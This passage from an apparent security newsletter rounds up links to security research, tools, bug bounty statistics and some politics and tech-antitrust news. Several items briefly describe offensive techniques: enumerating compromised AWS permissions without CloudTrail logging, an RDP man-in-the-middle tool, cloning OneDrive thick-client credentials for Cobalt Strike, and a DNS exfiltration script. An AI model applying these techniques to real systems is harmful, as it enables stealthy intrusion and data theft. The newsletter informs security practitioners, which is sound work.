__proto__ property. See Olivier Arteau’s whitepaper for more details, and this DailySwig post for a nice overview and some more recent work.
Doysensec has released the slides and code for their training: “Developing Burp Suite Extensions – From Manual Testing to Security Automation.”
Marco Lancini has collected and organized some great info and links about cloud-native technologies into one excellent resource.
Enumerate AWS API Permissions Without Logging to CloudTrail
Nick Frichette found a bug in the AWS API that allows you to enumerate certain permissions for a role without logging to CloudTrail. This allows pen testers and red teamers to stealthily enumerate what permissions the role or user they’ve compromised has access. This bug affects 645 different API actions across 40 different AWS services.
25 Ways Chinese State-Sponsored Actors Want to Exploit Your Systems
This NSA advisory lists 25 CVEs that are currently being used by Chinese state actors.
The Difficulties of Tracking Running Processes on Linux
Natan Yellin describes a number of potential approaches and their relative trade-offs.
“Performance analysis tools based on Linux perf_events (aka perf) and ftrace” by Brendan Gregg. Includes tools like
execsnoop to trace process
exec() with CLI argument details,
opensnoop to trace
open() syscalls showing filenames, and more. Useful for grokking what a program does. H/T William Bowling who referenced the tool in his blog post: GitHub Pages - Multiple RCEs via insecure Kramdown configuration - $25,000 Bounty.
Hunter Biden story is Russian disinfo, dozens of former intel officials say
A Python3 Remote Desktop Protocol (RDP) man-in-the-middle tool and library. Can watch connections live or after the fact. Blog post describing new features.
Segmentation Vault: Cloning Thick Client Access
Post by David Middlehurst: “In this blog we discuss a practical method for red teams to compromise thick client applications when they store credential material in “Vault”, using Microsoft OneDrive as an example. To enable access to OneDrive to be cloned we also present two tools that were subsequently developed that can be used in a C2 framework such as Cobalt Strike using
File Stream Oriented Programming: SECCON CTF 2020 - lazynote
Detailed write-up by Syed Faraz Abrar.
A Bash script that automates the exfiltration of data over DNS for when you have a blind command execution on a server where all outbound connections except DNS are blocked.
Politics / Privacy
New Features Coming to Signal Groups
“Today we’re releasing a new version of Signal groups that gives you a richer private group experience with group admins, granular permissions, @mentions and more.” Like nearly all of my security friends, Signal is my secure messaging app of choice, so it’s super exciting to see these improvements 🤘
U.S. Accuses Google of Illegally Protecting Monopoly
Overview by the NY Times.
United States v. Google
A deeper analysis by Stratechery, with interesting thoughts on Aggregation Theory, Google’s likely defense, and more. Ben Thompson’s Aggregation Theory article is fascinating, so I pulled some snippets here for easy reference.
Instead of trying to argue that Google should not make search results better, the Justice Department is arguing that Google, given its inherent advantages as a monopoly, should have to win on the merits of its product, not the inevitably larger size of its revenue share agreements. In other words, Google can enjoy the natural fruits of being an Aggregator, it just can’t use artificial means — in this case contracts — to extend that inherent advantage.
“More than 50 former senior intelligence officials have signed on to a letter outlining their belief that the recent disclosure of emails allegedly belonging to Joe Biden’s son ‘has all the classic earmarks of a Russian information operation.’” Exciting times 😅
“A powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner” by Ai Ho. You specify the fingerprint of what you’re looking for in YAML, see the jaeles-signatures repo for examples. Seems fairly similar to Project Discovery’s nuclei.
The Content Value Hierarchy (CVH)
Neat post by my friend Daniel Miessler on the various levels of content creation and their value, and how to protect your podcast or newsletter from being cut when people hit content overload. The article calls out tl;dr sec, which is pretty cool 😎
By Samuel Reed
: I’m not sure how to describe this, but it’s awesome. You load the web page and it dynamically starts editing/styling itself while describing what it’s doing. Pretty neat to watch.
I appreciated that this post by Emil Vaagland had a number of concrete stats and details.
- In its first year, FINN.no’s private HackerOne program has resulted in 221 reports, 129 of which received $55K divided among 31 researchers.
- One of the most critical findings in their program resulted from a one-line configuration change, not new complex code.
- Therefore: it’s not just massive new features or complex code that needs testing.
- Shopify publishes monthly stats from their public bug bounty program on Twitter (example).
- FINN’s rates: up to $150 for Lows, $300 for Mediums, $1,000 for Highs, $3,000 for Criticals.
- The rate bump between Medium+ is to incentivize higher impact reports and to compete with large programs for researcher talent.
- They pay bounties on triage after an impact assessment, not once the bug is fixed.
- Median triage time is about 45 minutes, and over 80% are triaged within one hour. This speed motivates hackers to continue testing FINN’s assets.
FINN, Visma, and Shopify’s data seems to confirm what is colloquially known: private programs tend to get higher signal submissions - more valid bugs, fewer non issues.
Comparing the signal (Resolved/Duplicate) to the noise (Not applicable / Informative) of 2 public programs (Shopify and Visma public) to 2 private programs (FINN and Visma private)
Thanks for reading!